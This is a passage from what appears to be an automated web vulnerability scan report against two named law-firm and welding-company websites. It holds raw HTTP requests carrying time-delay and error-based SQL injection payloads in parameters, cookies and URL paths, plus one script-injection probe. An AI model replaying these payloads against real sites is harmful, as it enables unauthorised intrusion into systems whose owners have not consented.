<form name="Form1" method="post" acti
...[SNIP]...
2.48. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [jv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The jv parameter appears to be vulnerable to SQL injection attacks. The payload ,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the jv parameter. The application took 29078 milliseconds to respond to the request, compared with 349 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1&ts=1304742738624.440&lc=http%3A%2F%2Fwww.hunton.com%2Fnews%2FuniGC.aspx%3FxpST%3DPENSearch%26nsextt%3D%2527%253E%253Cscript%253Enetsparker(9)%253C%2Fscript%253E&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1,0)waitfor%20delay'0%3a0%3a20'--&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=News%20%26%20Events%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None&h1websection=news HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch&nsextt=%27%3E%3Cscript%3Enetsparker(9)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1849; PortletId=5986402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Sat, 07 May 2011 00:53:50 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 921


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...
2.49. http://www.hunton.com/aboutus/uniGC.aspx [EventingStatus cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The EventingStatus cookie appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the EventingStatus cookie. The application took 60845 milliseconds to respond to the request, compared with 28128 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1waitfor%20delay'0%3a0%3a20'--; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:33:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
2.50. http://www.hunton.com/professionals/uniGC.aspx [EventingStatus cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The EventingStatus cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the EventingStatus cookie. The application took 39995 milliseconds to respond to the request, compared with 2810 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1',0,0)waitfor%20delay'0%3a0%3a20'--; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:30:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=3dc8e81d-f541-4b27-b4dc-f2ceacc23a78; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
2.51. http://www.hunton.com/professionals/uniGC.aspx [ZoneId cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The ZoneId cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the ZoneId cookie. The application took 33219 milliseconds to respond to the request, compared with 2810 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7',0)waitfor%20delay'0%3a0%3a20'--; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:27:28 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=6d620d41-9034-454a-8d58-923aa7816ed0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
2.52. http://www.hunton.com/professionals/uniGC.aspx [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie. The application took 63956 milliseconds to respond to the request, compared with 9107 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1'waitfor%20delay'0%3a0%3a20'--; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:53:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
2.53. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC; __utma=94003201.1070057693.1303147760.1303147760.1304727090.2; __utmb=94003201.1.10.1304727090; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:36 GMT
Connection: Keep-Alive
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br>
...[SNIP]...
2.54. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing'/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 27717
Date: Fri, 06 May 2011 19:12:53 GMT
X-Varnish: 1128246861
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing''/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29453
Date: Fri, 06 May 2011 19:12:54 GMT
X-Varnish: 1128247139
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
2.55. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images'/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 27716
Date: Fri, 06 May 2011 19:12:59 GMT
X-Varnish: 1128247898
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images''/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29451
Date: Fri, 06 May 2011 19:13:00 GMT
X-Varnish: 1128248119
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
2.56. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:13:05 GMT
Connection: Keep-Alive
Content-Length: 27752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
